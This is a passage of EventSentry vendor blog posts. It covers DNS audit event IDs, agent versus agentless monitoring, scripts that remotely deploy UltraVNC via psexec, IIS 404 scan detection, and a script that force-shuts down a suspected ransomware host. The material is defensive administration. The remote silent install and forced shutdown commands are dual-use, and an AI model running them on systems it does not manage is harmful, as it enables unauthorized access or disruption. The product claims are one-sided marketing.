| 526 | Zone unsign | 564 | Update from DS |
| 527 | Zone re-sign | 565 | Write and notify |
| 528 | Key rollover start | 566 | Force aging |
| 529 | Key rollover end | 567 | Scavenge servers |
| 530 | Key retire | 568 | Transfer key master |
| 531 | Key rollover triggered | 569 | Add SKD |
| 533 | Key poke rollover | 570 | Modify SKD |
| 534 | Export DNSSEC | 571 | Delete SKD |
| 535 | Import DNSSEC | 572 | Modify SKD state |
| 536 | Cache purge | 573 | Add delegation |
| 537 | Forwarder reset | 574 | Create client subnet record |
| 540 | Root hints | 575 | Delete client subnet record |
| 541 | Server setting | 576 | Update client subnet record |
| 542 | Server scope create | 577 | Create server level policy |
| 543 | Server scope delete | 578 | Create zone level policy |
| 544 | Add trust point DNSKEY | 579 | Create forwarding policy |
| 545 | Add trust point DS | 580 | Delete server level policy |
| 546 | Remove trust point | 581 | Delete zone level policy |
| 547 | Add trust point root | 582 | Delete forwarding policy |
| 548 | Restart server | | |
| 549 | Clear debug logs | | |
| 550 | Write dirty zones | | |

We hope that DNS changes will no longer be a mystery after activating DNS auditing. Don't fear if you're running 2012 or earlier, the next post is on its way.

Mariano + Ingmar.

Agent vs Agentless: Why you should monitor (event) logs with an agent-based log monitoring solution

The debate as to whether agent-based or agent-less monitoring is "better" has been answered many times over the years in magazine / online articles, blog posts, vendor white papers and more. Unfortunately, most of these articles are incomplete, inaccurate, biased, or a combination thereof.

To make things slightly more confusing, different ISVs use different methods for monitoring servers and workstations. Some use agents, some don't, and a small few offer both methods. But what is ultimately the best method?

What are you monitoring?

First it's important to determine what is being monitored in order to decide whether an agent-based or agent-less approach is better. For example, collecting system metrics like performance data usually creates fewer challenges than transmitting large amounts of (event) log data. Furthermore, agent-based monitoring is not an option for devices which run a proprietary embedded OS (think switch, printer, …) where you can't install an agent in the first place.

Consequently I’ll be focusing on monitoring (event) logs with an emphasis on Microsoft Windows in this post. Having developed both agent-based as well as agent-less components in C++ over the years I feel that I am in a good position to objectively compare agent-based with agent-less approaches.

The Myths

Monitoring software is of course not the only type of software that uses agents; a lot of other enterprise software (backup, deployment, A/V, …) uses agents as well. Below are some of the myths as to what (monitoring) using agents entails:

  • Agents may use up too many resources on the monitored hosts and slow down the monitored machines
  • Agents can become unstable and negatively affect the host OS
  • Deploying and managing agents is tedious and time-consuming
  • Installing agents may require the installation & deployment of dependencies the agents need (.NET, Java, …)
  • Installing third-party software will decrease the security of the monitored host

The Reality

It’s understandable that software which is installed on potentially every server and workstation in a network undergoes some level of scrutiny, but would you be surprised to learn that agents excel in the following areas:

1. Security: Better security since agents push data to a central component, instead of the monitored server being configured to allow remote collection.
2. Reliability: Agents can temporarily store and cache monitored logs if connectivity to the central monitoring server is lost, even if local logs are no longer available. Agents can also take corrective actions more quickly because they can work in isolation (offline). Mobile devices cannot be monitored with agent-less solutions since they cannot be reached by the central monitoring component.
3. Performance: Agents can apply local filtering rules and only transmit data which is valuable, thus increasing throughput while decreasing network utilization.
4. Functionality: They offer more capabilities since there are essentially no limits as to what type of information can be gathered by an agent since it has full access to the monitored system.

The Easy Way Out

Developing agents along with an easy-to-use deployment mechanism requires a lot of time and resources, so it doesn't come as a surprise that many vendors prefer to monitor hosts without agents. To compensate for the shortfall, ISVs which rely solely on an agent-less approach will do their best to:

  • Emphasize that they do not use agents
  • Persuade you that agent-less monitoring is preferable

The irony, when promoting a solution as agent-less, is that even so-called agent-less solutions do in fact utilize an agent – the only difference being that the agent is (usually) integrated into Windows. Windows doesn't just magically service remote clients asking for a boatload of WMI data – it processes these requests through the WMI service, which, for all intents and purposes, is an agent. For example, accessing the Windows event logs via WMI traverses significantly more layers than accessing the event logs directly.

Conclusion

With the exception of network devices where an agent cannot be installed, agent-based solutions will provide a more thorough monitoring experience 9 out of 10 times – assuming that the agent meets all the checklist requirements below.

Some event log monitoring vendors will try to convince you that agent-less monitoring is better & easier (easier for whom?) – but don’t fall for it. We’ve been tweaking and improving the EventSentry agent for more than 10 years, and as a result EventSentry offers one of the most advanced and efficient Windows agents for log monitoring on the market. Developing a rock-solid, secure and fast agent is hard, but it’s the only sensible approach which doesn’t cut corners.

There are situations when deploying a full-scale monitoring solution with agents is not possible, for example when you are tasked with monitoring a third-party network where installing any software is not an option. While unfortunate, an agent-less monitoring solution can fill the gap in this case.

EventSentry also utilizes SNMP (agent-less) to gather inventory, performance metrics as well as other system data from non-Windows devices, including Linux hosts. This collection method does suffer from the above limitations, but since log data is pushed from non-Windows devices via the Syslog protocol, it's an acceptable compromise.

Don’t compromise when it comes to monitoring the (event) logs of your Windows infrastructure and select an architecture which scales and offers security & performance.

Technical Comparison

The comparison below examines the differences between agent-based and agent-less solutions in greater detail.

Resource Utilization & Performance

Agent-Based:
  • Usually higher throughput since agents can analyze, filter and evaluate log entries before sending them across the network.
  • Local resource utilization depends on the implementation of the agent.
  • Agents can access (event) logs directly via efficient API access.

Agent-Less:
  • Network utilization is likely much higher since more logs have to be transmitted across the network before being evaluated. Local filtering capabilities are limited and depend on the protocol (usually WMI).
  • Network latency and utilization affect the performance of the monitoring solution. Network utilization cannot be controlled.
  • Accessing (event) log data remotely through WMI is much less efficient.
  • Over-saturation of the central monitoring component can negatively affect monitoring of the entire infrastructure.

Verdict: Higher network utilization, combined with the fact that remote log collection still utilizes CPU cycles on the remote host (e.g. through the WMI provider), favors agent-based solutions. Agent-less solutions have a single point of failure, while agents can filter & evaluate data locally before transmitting it to a central database.

EventSentry: Agents are designed to be essentially invisible under normal operations and do not impact the host system negatively in any way.

Stability & Reliability

Agent-Based:
  • Failure of an agent does not affect monitoring of other hosts.
  • Locally collected data can be cached if the central monitoring component is temporarily unavailable.
  • Failure of a central component may negatively affect deployed agents if they rely on the central component and cannot cache data.

Agent-Less:
  • Failure of the central monitoring system will affect and potentially disable monitoring of all hosts.
  • Hosts which lose network connectivity (e.g. laptops) cannot be monitored while unreachable.

Verdict: Agent-based solutions have an advantage since local data can be cached and corrective actions can be executed even when the central monitoring component is unavailable. Cached data & logs are re-transmitted – even if the local logs have been cleared or overwritten. Agent-based solutions can also monitor hosts while they are disconnected from the LAN.

EventSentry: The agent auto-recovers if the process aborts unexpectedly, and by default alerts the user when this occurs. When using the collector (default), the agent caches all data locally and retransmits when the network connection becomes available again.

Deployment

Agent-Based:
  • Has to be deployed either with vendor management software and/or with third-party deployment software if the vendor provides an installation package (e.g. MSI).

Agent-Less:
  • Larger deployments will require multiple central monitoring components, potentially distributed over several LANs.
  • Only hosts in the local LAN can be monitored.

Verdict: Depends on the deployment tools made available by the vendor as well as the management tools in place for configuring Windows settings. A poorly developed deployment tool would favor an agent-less solution.

EventSentry: Agents can be deployed (multi-threaded) with the management console or through 3rd party deployment software by creating a MSI installer on the fly. When using the collector (default), agent updates (patches) can be deployed automatically.

Dependencies

Agent-Based:
  • The agent may have dependencies on third-party frameworks.

Agent-Less:
  • Depends on whether the mechanism utilized by the monitoring software requires a Windows component to be added and/or configured.

Verdict: Depends on whether the agent has dependencies and whether configuration changes need to be made on the monitored hosts.

EventSentry: The agent does not depend on any 3rd party frameworks or libraries.

Security

Agent-Based:
  • Potential security issues if the installed agent exposes itself to the network (if not firewalled) and/or suffers from local vulnerabilities which can be exploited.

Agent-Less:
  • Remote log collection has to be enabled and at least the central monitoring component needs to have remote access.
  • Secure data transmission relies on protocols and settings from Windows.
  • Enabling multiple methods for gathering data remotely (e.g. WMI) provides additional attack vectors.
  • Credentials (usually a Windows user/password) for remote systems must be stored in a central location so that the remote hosts can be queried. If the central system gets compromised, critical credentials can be exploited.

Verdict: Since agent-based solutions do not require permanent remote access and monitored hosts can therefore be hardened more, they are inherently more secure IF the agent doesn't suffer from an insecure design and/or vulnerabilities. Agent-based solutions also have more control over how data is transmitted from the remote hosts. If there is a general concern about third-party software then the product in question should be researched in a vulnerability database like http://www.cvedetails.com.

EventSentry: The agent does not open any ports on a monitored host and resides in a secured location on disk. The agent transmits compressed data securely via TLS to the collector. No major security vulnerabilities have been discovered in the EventSentry agent since its first release in 2002.

Scope & Functionality

Agent-Based:
  • Agents have full access to the monitored system and can choose which technology to utilize to get the required data (API, WMI, registry, …).
  • Local corrective actions, like launching a script or process, are easy to execute.

Agent-Less:
  • Agent-less solutions are limited to the remote APIs provided by the monitored host, most commonly WMI. While WMI does offer a lot of functionality, there are limitations.
  • Executing scripts on a remote host is more involved and only possible while the host is reachable.

Verdict: Agent-based solutions have an advantage since they can utilize multiple technologies to obtain data, including highly efficient direct API access. Agents can also trigger (corrective) actions locally even while the host is unreachable from the central component. Agent-less solutions can only monitor data which is made available by the remote protocol.

EventSentry: The agent accesses log files, event logs and other system health data almost exclusively via direct API calls. The more resource-intensive WMI interface is only used minimally, for very specific purposes. Corrective action can be taken directly on the monitored host, often only milliseconds after an error condition (event) has occurred.

 

Appendix: Checklist

When evaluating software that offers agents, you can utilize the checklist below.

Resource Utilization
An agent needs to consume as few resources as possible under normal operations. With the exception of short (and unusual) peak periods, a user should never know that an agent is running on their server or workstation – period.
The thought of having a resource-hogging agent running on a server sends shivers down the backs of many SysAdmins, and the agents used by certain AntiVirus vendors that rhyme with Taffy didn’t set a good precedent.
Stability & Reliability
The agent needs to run at all times without crashing – the SysAdmin needs to be able to go to sleep knowing that his agents will reliably monitor all servers and workstations. Unstable agents are just no fun, especially when they negatively impact the host OS.
If an agent encounters an issue, it needs to at least auto-recover and communicate the issue to the admin.
Deployment
Agent deployment and management needs to be streamlined and easy – it shouldn’t be a burden on the end user. And while agent deployment is important, agent management, keeping the remote agent up-to-date, is equally important and should – ideally – be handled automatically.
Most SysAdmins have enough work the way it is, the last thing they need is baby-sitting agents of their monitoring solution.
Dependencies
The more dependencies an agent has, the more difficult it is to deploy the agent. Agents that rely on complex frameworks like .NET, Java or specific Visual Studio runtimes are difficult and time-consuming to deploy.
Furthermore, any third-party software that is installed as a dependency creates an additional attack vector and needs to then be kept up-to-date.
Security
An agent needs to be 100% secure and cannot expose the monitored host to any additional security risks. I will explain below why using agents is actually more secure than not using an agent – even though this seems counter-intuitive at first glance.

Remote Support with VNC – The Easy & Secure Way!

Almost everyone in IT has heard of VNC – which actually stands for "Virtual Network Computing". The RFB (Remote Framebuffer) protocol, which VNC relies on, was developed around 1998 by the Olivetti & Oracle Research Labs. Olivetti (unlike Oracle) isn't much known outside of Italy/Europe, and the ORL was ultimately closed in 2002 after being acquired by AT&T. But enough of the history.

When the need arises to remotely log into a (Windows) host on the network, Microsoft’s Remote Desktop application (which utilizes Microsoft’s RDP protocol – not RFB) is usually the default choice. And why wouldn’t it be? It’s built into Windows, there is no additional cost, and it’s usually quite efficient (=fast) – even over slower connections.

Remote Desktop has a few disadvantages though, especially when it comes to the IT help desk:

  • You cannot view the remote user’s current desktop
  • It’s not cross-platform
  • You can’t use RDP if it’s disabled or misconfigured

Especially when troubleshooting user problems, being able to see exactly what the user is doing is obviously very beneficial. VNC-based applications are a good alternative since they allow you to view the user’s desktop and subsequently interact with the user. This makes VNC viable for help desk as well as troubleshooting. Nevertheless, VNC-based solutions have their own shortcomings:

  • Free variations of VNC usually offer no deployment assistance
  • With over 10 variants available, finding the best VNC implementation is a daunting task
  • VNC is still deemed somewhat insecure
  • VNC can be slow

We set out to solve these shortcomings by creating a number of scripts around UltraVNC that integrate with the EventSentry management console (although they’ll work well without EventSentry as well!). Using the QuickTools feature, you can then connect to a remote host via VNC with 2 clicks, even if the remote host doesn’t have VNC installed.

Important: The scripts only work in environments where you have administrative access to the remote hosts. The scripts need to copy files to the remote host’s administrative shares and control the remote VNC service.

Alternatively, you can also start a VNC session by running the following command:

vnc_start.bat remotehost.yourdomain.com

Even better, VNC can be automatically stopped and deactivated (until vnc_start.bat is run again) once the session is completed in order to reduce the attack surface.

VNC Deployment
As long as you have administrative access to the remote host(s), the script will remotely install VNC and even set up a firewall exclusion rule if necessary – although the UltraVNC installer takes care of this out of the box.

Security
To reduce the attack surface of machines running VNC you can automatically stop the VNC service after you have disconnected from the remote host. Our connection script will automatically start the remote service again when you connect the next time.

For the utmost security you can also completely uninstall VNC when you are done; a script (vnc_uninstall.bat) is included for this purpose.

Speed
Even though VNC is generally not as fast as RDP, it’s usually sufficiently fast in LAN environments (especially for shorter troubleshooting sessions), and the UltraVNC variant which we’ll be covering in this post performs reasonably well even over slower WAN connections.

Integration with EventSentry
Monitoring workstations with EventSentry strengthens the capabilities of any IT helpdesk and IT support team with:

  • Software & Hardware Inventory
  • Access to process utilization and log consolidation
  • Enhanced security with security log & service monitoring
  • User console logon tracking
  • Pro-active troubleshooting with access to performance and other system health metrics

Remote desktop sharing is an additional benefit with the UltraVNC package which is included with the latest version of EventSentry (v3.3.1.42). Customizing the scripts and integrating them with EventSentry literally shouldn’t take more than 5 minutes, and once set up & configured they will allow you to remotely control any monitored host with a couple of clicks. The scripts do not require EventSentry, but are included with the setup and integrate seamlessly into the EventSentry Management Console.

The EventSentry Management Console includes the “QuickTools” feature which allows you to link up to 8 commands to the context menu of a computer item. EventSentry ships with a few default QuickTools commands, for example to reboot a remote machine. Once configured, you simply right-click a computer icon in the EventSentry Management console and select one of the pre-configured applications from the QuickTools sub menu.

EventSentry QuickTools

How does it work?
When you run the vnc_start.bat script, it will first check to see if UltraVNC is already installed on the remote host. If it is, it will skip the installation routine and bring up the local VNC viewer. If you configured the script to automatically stop the VNC service when not in use, it will start the service beforehand. When you disconnect, it will (optionally) stop the VNC service again so that VNC is not accessible remotely anymore.

If VNC is not installed, the script will remotely install & configure UltraVNC using psexec.

If you do not want to leave the UltraVNC service installed on the remote computer, the vnc_uninstall.bat script can be run when the remote session is done. Automatically stopping the remote VNC service is however sufficient in most cases.
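For those curious, the overall flow can be sketched in a few lines of batch. This is a simplified illustration only – not the shipped script – and the service name (uvnc_service), installer switch and variable names are assumptions based on the variables.bat description later in this post:

@echo off
REM Simplified sketch of the vnc_start.bat flow - not the shipped script.
REM Assumes variables.bat defines VNCSOURCE, VNCSETUP_X64, PSEXECFILE, VNCVIEWER
REM and SET_VNC_SVC_TO_MANUAL; "uvnc_service" is assumed to be the UltraVNC service name.
call variables.bat
set REMOTEHOST=%1

REM Is the UltraVNC service already installed on the remote host?
sc \\%REMOTEHOST% query uvnc_service >NUL 2>&1
if ERRORLEVEL 1 (
    REM Not installed yet: push & run the installer remotely via psexec
    "%PSEXECFILE%" \\%REMOTEHOST% -c -h "%VNCSOURCE%\%VNCSETUP_X64%" /verysilent
)

REM Make sure the remote VNC service is running before connecting
sc \\%REMOTEHOST% start uvnc_service >NUL 2>&1

REM Launch the local viewer (blocks until the session ends)
"%VNCVIEWER%" %REMOTEHOST%

REM Optionally stop the service again to reduce the attack surface
if "%SET_VNC_SVC_TO_MANUAL%"=="1" sc \\%REMOTEHOST% stop uvnc_service >NUL 2>&1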

Prerequisites
There is not much you need: administrative access to the remote host(s), psexec.exe and the UltraVNC installers – the setup steps below cover where to put everything.

Installation
The scripts need to be configured before they can be used in your environment, unless you are an EventSentry user, in which case you only need to download & install the prerequisites.

Super Quick Setup for EventSentry Users
It’s no secret that we’re a little biased towards our EventSentry users, and as such setting this up with an existing EventSentry installation is rather easy:

  1. Get psexec.exe and save it in C:\Program Files (x86)\EventSentry\resources.
  2. Download the UltraVNC installers (they have 32-bit and 64-bit – download for the platforms you have on your network) and store them in the C:\Program Files (x86)\EventSentry\scripts\ultravnc folder.
  3. Install UltraVNC on the computer where EventSentry is installed so that the VNC Viewer is available. It’s not necessary to install the whole package; only the viewer component is required.
  4. If “VNC” is not listed in your QuickTools menu, then you will need to add it under Tools->Options->QuickTools. Simply enter “VNC” as the description and specify the path to the vnc_start utility, e.g. “C:\Program Files (x86)\EventSentry\scripts\ultravnc\vnc_start.bat $COMPUTER”. You can optionally check the “Hide” box to prevent the script output from being shown before you connect.

You’ll notice that no password was configured – that’s because you will be logging in with a Windows user name and password, with only domain admins being allowed access by default. If you want to give access to additional groups and/or users that are not domain admins, this can be configured in the authorized_acl.inf file.

That’s literally it – easy as pie. Even though we designed this to be easy peasy, things do occasionally go wrong, so I recommend testing a first connection from the command line. Just open an administrative command prompt, navigate to C:\Program Files (x86)\EventSentry\scripts\ultravnc and type vnc_start somehost.

Now just right-click any host – or use the “Quicktools” button in the ribbon – and select the “VNC” menu option. Keep in mind that first-time connections will take longer since the VNC setup file has to be copied and installed on the remote computer. Subsequent connections should be faster.

VNC Viewer Connect Dialog

Manual Normal-Speed Setup for Non-EventSentry Users
So you are not an EventSentry user but still want to utilize these awesome scripts? No problem – we won’t hold it against you. The setup is still easy – you’ll just need to customize a few variables in the variables.bat file.

  1. Download the package from here.
  2. Create a local folder for this project, e.g. C:\Deployment\UltraVNC.
  3. Copy all the scripts to this folder, e.g. you should end up with C:\Deployment\UltraVNC\vnc_start.bat
  4. Open the file variables.bat in a text editor and keep it open as you will be making a few modifications to this file.
  5. In variables.bat, set the VNCSOURCE variable to the directory you just created.
  6. Download the latest version of both the 32-bit and 64-bit UltraVNC installers.
  7. In variables.bat, set the VNCSETUP_X86 and VNCSETUP_X64 variables to the setup file names you just downloaded.
  8. Download the PSTools and extract psexec.exe into the working directory, or a directory of your choice.
  9. In variables.bat, point the PSEXECFILE variable to the location where you just saved psexec.exe.
  10. Optional: Edit the authorized_acl.inf file to specify which Windows group or user will have access to VNC. You can either change the first line, or add additional lines to give additional users and/or groups permission.
  11. Install the respective version of UltraVNC on your workstation so that the VNC Viewer is available.
  12. Open a command line window and navigate to the folder VNCSOURCE points to. Test the setup by running vnc_start hostname, replacing “hostname” with an actual host name of a remote host of course.
  13. When presented with the login screen of the VncViewer, log in with a Windows domain admin user.

That wasn’t so bad now, was it? Just remember that you’ll need to initiate any VNC session with the vnc_start.bat file. Launching the viewer directly won’t work – even if VNC is already installed on the remote machine – since the VNC service is stopped by our scripts by default. To use the folder names we created, you’ll just run

C:\Deployment\UltraVNC\vnc_start hostname

Enjoy, and happy RFBing!

Connecting to remote host

Configuration – variables.bat
For the sake of completeness the variables.bat file is explained below:

VNCSETUP_X86: The file name of the 32-bit installer. This only needs to be changed when UltraVNC releases a new version.
VNCSETUP_X64: The file name of the 64-bit installer. This only needs to be changed when UltraVNC releases a new version.

REMOTEINSTALLPATH: The directory where the script files will be copied to on the remote host.

VNCSOURCE: This is the folder where all the vnc-related files, including the setup executables, are located on the source host from where you initiate VNC connections – e.g. C:\Deployment\UltraVNC.
VNCINSTALLDIR: The directory in which UltraVNC will be installed (on the remote hosts).

VNCPASSWORD: This variable is not currently used since UltraVNC is automatically configured to authenticate against Windows, by default giving only Domain Admins access to VNC. This is generally more secure than using a password. You can edit the file authorized_acl.inf to give additional users and/or groups access to VNC. The file supports one ACL entry per line.

PSEXECFILE: Unfortunately we are not allowed to bundle the nifty psexec.exe file for licensing reasons, so you’ll have to download the PsTools and point this variable to wherever you end up copying the psexec.exe file to. If you already have psexec.exe installed then you can save yourself 2 minutes of time and just specify the path to the existing file here.

SET_VNC_SVC_TO_MANUAL: If you don’t entirely trust the security of VNC – maybe because you know what a brute force attack is – and you only want administrators to access VNC, then you can set this variable to 1. As long as you only connect to the remote host(s) using the vnc_start.bat script, the scripts will ensure that the remote VNC service is started before you connect and stopped after you disconnect. Between the two of us, I’d always leave this set to 1 unless you have the desire to launch the VNC Viewer directly, or need non-administrators to be able to connect to the remote host(s).

ADD_FIREWALL_RULE: As the name (almost) implies, this will create a firewall exclusion rule on the remote host(s) if you’ve been doing your homework and enabled the Windows firewall. If you don’t like our boring firewall rule name then you can even change the name below by editing the FW_RULE_NAME variable. Enabling this is usually not necessary since the UltraVNC setup adds firewall exclusion rules by default.

VNCVIEWER: If you find that a different version of the VNC viewer works better than the version which we are shipping, then you can change the file name here.
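To put the individual settings into context, a filled-in variables.bat could look roughly like the example below – every file name and path is a placeholder for illustration, so adjust the values to the installer versions and directories you actually use:

@echo off
REM Example variables.bat - all values below are placeholders, not defaults
set VNCSETUP_X86=UltraVnc_x86_Setup.exe
set VNCSETUP_X64=UltraVnc_x64_Setup.exe
set REMOTEINSTALLPATH=C:\Temp\UltraVNC
set VNCSOURCE=C:\Deployment\UltraVNC
set VNCINSTALLDIR=C:\Program Files\UltraVNC
set VNCPASSWORD=
set PSEXECFILE=C:\Deployment\PSTools\psexec.exe
set SET_VNC_SVC_TO_MANUAL=1
set ADD_FIREWALL_RULE=0
set FW_RULE_NAME=UltraVNC
set VNCVIEWER=vncviewer.exe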

 

Detecting Web Server Scans in Real-Time

Any web site exposed to the Internet is constantly being probed by bots, malicious hackers and other evildoers in an attempt to take over the machine, gain access to unauthorized data, install back doors and so forth. Detecting probing attempts as early as possible and taking corrective action as soon as possible is key to maintaining a secure network.

Manual probing usually involves inspecting the HTTP headers to determine the type of web server (e.g. IIS, Apache, Nginx), viewing HTML sources and possibly attempting to access well-known pages in order to determine whether any popular web-based software (WordPress, CRM, OWA, …) is installed.

IIS Email Alert
Email alert from an IIS web site scan

If the attacker prefers the sledgehammer approach then he or she may also point a vulnerability scanner such as OpenVAS at the web server, which will reveal vulnerabilities with a minimum amount of work. Automated systems aren’t as surgical and will usually just look for specific vulnerabilities by checking for the existence of various URLs on the web server.

But whether it’s a manual probe, a vulnerability scan or a bot, all methods usually involve attempts to access non-existent pages (URLs), resulting in “Page Not Found” (404) errors at some point. As such, a larger than usual number of 404 errors can be a good indicator that suspicious activity is occurring on your web server. If you are a little paranoid like me then you could even look for every single 404 error that occurs on your web server. The same technique can be applied to other errors as well, for example “Access Denied” errors if the web site is secured by ACLs.

EventSentry’s log file monitoring feature can monitor Windows-based log files in real time and trigger alerts and/or corrective actions by applying sophisticated rulesets to all parsed text.

Log File Flow (Icon made by Freepik from www.flaticon.com)

I’ll explain how this can be set up based on an IIS web server, but the same generic steps apply to other web servers as well.

  1. Define the log file
    The first step is to tell EventSentry which log file you’d like to monitor in the management console. Using the ribbon, click on “Packages”, “Log Files” and “Define Files”. In the “Log Files” section on top, click on the plus icon (+) and define the log file. Give the file a descriptive name, specify the path to the log file and select “Non-Delimited” as the file type. Make sure to utilize wildcards or variables for the log file path if the name of the log file is dynamic, as shown in the screenshot below:

    IIS Log File Setup

    If you plan on storing contents in the EventSentry database as well then you can also select a matching log file definition (such as IIS 7) as the log file type. More information on log file types can be found in our IIS Log File Monitoring with EventSentry screen cast.

  2. Setup a log file filter
    A log file filter defines where content from the log file is routed to. In this example we’ll route 404 errors to the Application event log. Using the ribbon again, and while still in the log file context, click on “Add Package” on the top left to create a new package – give the package a descriptive name. Then, click the “Assign” button to assign this package globally, to a group or individual host. (remember that you can also assign packages dynamically). Now click “Add” in the “Log File” section to add the previously configured log file to the package.

    Log File Filter
    Specify how log file content is routed

    In the resulting dialog we can configure the log file filter to send log file contents to the database, the event log or both. For the purpose of this example we will only log certain lines of the log file to the event log – those matching the wildcard filter * 404* (note the space between the first * and 404; a sample matching log line is shown after these steps). You can also use a regular expression for a more sophisticated match type.

  3. Setup Event Log Filter
    At this point EventSentry will log an informational event every time the text ” 404″ is logged to the specified log file. In order to dispatch this event however (e.g. to an email recipient), an include filter needs to be set up which should look similar to the screenshot below:

    Event Log Filter for Log File Alert

That’s all that is required to send an email or launch a process every time a 404 error occurs on your web server. Read on to refine this setup and only get alerted when the same remote IP address triggers a certain number of 404 errors within a certain time period – fun!
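For reference, the leading space in the wildcard filter matters: it ensures we match the status code field rather than a “404” that just happens to appear somewhere inside a URL. A hypothetical IIS log line (W3C format, default fields, made-up values) that would match * 404* looks like this:

2016-08-01 14:02:33 10.0.10.5 GET /wp-login.php - 443 - 203.0.113.7 Mozilla/5.0 404 0 2 15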

Additional Resources
Owasp.org is a great resource for web developers, providing a plethora of information to help keep web sites secure. The OWASP Top 10 document describes the most critical web application security flaws.

Tutorial: Delimited Log File Monitoring
Screen Cast: Log File Monitoring with EventSentry

Bonus for Advanced Users (requires EventSentry v3.3 or later)
Getting alerts whenever specific text – like a 404 error – is logged is quite useful, but utilizing EventSentry’s advanced event log filter & threshold features can reduce noise and make monitoring log file contents even more actionable.

EventSentry has supported utilizing insertion strings from events for quite some time, allowing you to use those insertion strings either in actions (e.g. an email subject, a parameter for a script) or thresholds. Since events don’t always utilize insertion strings properly, or custom content in events needs to be parsed separately, EventSentry v3.3 and later let you define insertion strings based on regular expressions. The screenshot below shows insertion strings before and after a regular expression fitted for IIS 7.5 is applied to EventSentry’s log file monitoring alert:

Apply RegEx to Event
Overriding insertion strings by applying a regular expression

You can learn more about insertion strings here, and view insertion strings either with the Event Message Browser or the EventSentry Management Console (Tools -> Utilities). The regular expression for a default IIS 7.5 setup is as follows:

([0-9]{4}-[0-9]{2}-[0-9]{2}) ([0-9]{2}:[0-9]{2}:[0-9]{2}) ([0-9\\.]*) ([A-Z]*) (.*?) (.*?) ([0-9]*) (.*?) ([0-9\\.]*) (.*?) ([0-9]*) ([0-9]*) ([0-9]*) ([0-9]*)
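Applied to the hypothetical log line shown earlier, each capture group becomes a numbered insertion string. Assuming the default IIS (W3C) field order, the most useful ones for our purposes would be:

  • $STR5 – the requested URL (/wp-login.php)
  • $STR9 – the remote (client) IP address (203.0.113.7)
  • $STR11 – the HTTP status code (404)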

Since insertion strings can be used in variables (e.g. $STR1 … $STR14) and thresholds, overriding insertion strings in an event has two main benefits:

  • Use any field from the log file in the email subject and other action fields
  • Create thresholds based on log file content – e.g. create dynamic run-time thresholds for each IP address

Regular expressions are set using the “Advanced” button on the “Generic” tab of an event log filter. In the advanced dialog, simply click “Edit” in the “Insertion String Override” section.

Using insertion strings in emails
The generic EventSentry email subject is nice, but a customized subject reflecting the type of alert would certainly be better:

Red Alert: IIS scan detected from IP $STR9

This is possible with the redefined insertion strings, since #9 (=$STR9) is the remote host’s IP address. To set a custom subject, click the “Advanced” button on the “Generic” tab of an event log filter.

Using insertion strings in thresholds
By default, threshold counters are increased every time an event matches the corresponding filter. To stick with our example here, we could configure EventSentry to let us know if more than three 404 errors occur within 5 minutes. But we’d essentially be throwing all events into the same bucket. If you look at it in detail however, you realize that it makes a difference whether three 404 errors are a result of activity from the same remote host, or three different remote hosts.

Since events are often a result of specific activity by something or somebody, it’s important that we can correlate multiple events. In our example, the “something” is the remote host, which is represented by insertion string $STR9. As such, we can configure our threshold to use $STR9 as the common identifier, and create unique thresholds based on the run-time value of $STR9. By doing that, we will trip the threshold only if the same remote host accesses a non-existing URL three times, but not if three different remote hosts only access one non-existent URL each.

Event Log Filter Threshold

The same technique can be applied to thresholds for failed logon events. It’s usually acceptable if a user types the wrong password a few times, but a large number of failed logons from the same user is not. Just applying a threshold to all 4625 events is usually not practical since many users occasionally type a wrong password. But by tying the threshold to the insertion string representing the user name (they are 6 & 7 in case you are curious), we can create a separate threshold for every user and avoid false positives.

Defeating Ransomware with EventSentry – Remediation

Since Ransomware is still all the rage – literally – I decided to write a 4th article with a potentially better method to stop an ongoing infection. In part 1, part 2 and part 3 we focused mostly on detecting an ongoing Ransomware infection and utilized the “nuclear” option to prevent it from spreading: stopping the “server” service which would prevent any client from accessing files on the affected server.

While these methods are certainly effective, there are other more targeted steps you can take instead of or in addition to shutting down the server service, provided that all hosts susceptible to a Ransomware infection are monitored by EventSentry.

When EventSentry detects an ongoing Ransomware infection, it can usually determine the infected user by extracting the domain user name from the 4663 event. Simply disabling the user is insufficient however, since a disabled user can continue to access the network (and wreak havoc) as long as he or she doesn’t log off. Any subsequent log on attempt would of course fail, but that provides little comfort when the user’s computer continues to plow through hundreds or thousands of documents, relentlessly encrypting everything in its path.

As such, the only reliable way to stop the ongoing infection, given only the user name, is to log off the user. While logging a user off remotely is possible using the query session and logoff.exe commands, I prefer to completely shut down the offending computer in order to reduce the risk of any future malicious activity. Logging the user off remotely may still be preferable in a terminal server environment (let me know if you want me to cover this in a future article).

Knowing the user name is of course great, but how do we find out which computer he or she is logged on to? If you have EventSentry deployed across your entire network – including workstations – then you can get this info by querying the console logon reports in the EventSentry web reports. If you are not lucky enough to have EventSentry deployed in your entire environment (we offer significant discounts for large quantities of workstation licenses – you can request a quote here), then we can still obtain this information from the “net session” command in Windows.

Net Session Output

We’ve created a little script named antiransom_shutdown.vbs which, given a user name, will report back from which remote IP this user most recently accessed the local server and optionally shut it down. Here are some usage examples:

Find out from which computer boris.johnson most recently accessed this server:
cscript.exe C:\Scripts\antiransom_shutdown.vbs boris.johnson

Find out from which computer boris.johnson most recently accessed this server AND shut the remote host down (if found):
cscript.exe C:\Scripts\antiransom_shutdown.vbs boris.johnson shutdown

The script uses only built-in Windows commands, so there is no need to install anything else on the server where it runs.

When executed with the “shutdown” parameter, the script will issue a shutdown command to the remote host, which will display a (customizable) warning message to the user indicating that the computer is being shut down because of a potential infection. The timeout is 5 seconds by default but can be customized in the script. It’s recommended to keep the timeout short (5-10 seconds) in order to neutralize the threat as quickly as possible while still giving the user a few moments to know what is happening.
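While the actual antiransom_shutdown.vbs is written in VBScript, the general approach can be sketched with built-in commands as well. The snippet below is a simplified illustration (user name as the first parameter, no error handling or logging), not the shipped script:

@echo off
REM Simplified sketch: locate the "net session" entry for the user passed in %1
REM and (optionally) shut that computer down. The shipped VBScript does more checking.
set REMOTEPC=
for /f "tokens=1" %%a in ('net session ^| findstr /i "%1"') do set REMOTEPC=%%a

if "%REMOTEPC%"=="" (
    echo No active session found for user %1
    exit /b 1
)

echo User %1 is connected from %REMOTEPC%
if /i "%2"=="shutdown" (
    shutdown /s /f /m %REMOTEPC% /t 5 /c "Potential ransomware activity detected - this computer is being shut down"
)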

The overall setup of the Ransomware detection is still the same: we’re setting up a threshold filter to detect a higher than usual frequency of certain 4663 events and trigger an action in response. Only this time we don’t shut down the server service, but instead trigger this script. To properly execute the action, configure it as shown in the screenshot below. The executable is cscript.exe (the interpreter for .vbs files) and the command line parameters are the name of the script, $STR2 and “shutdown”.

Remote workstation shut down

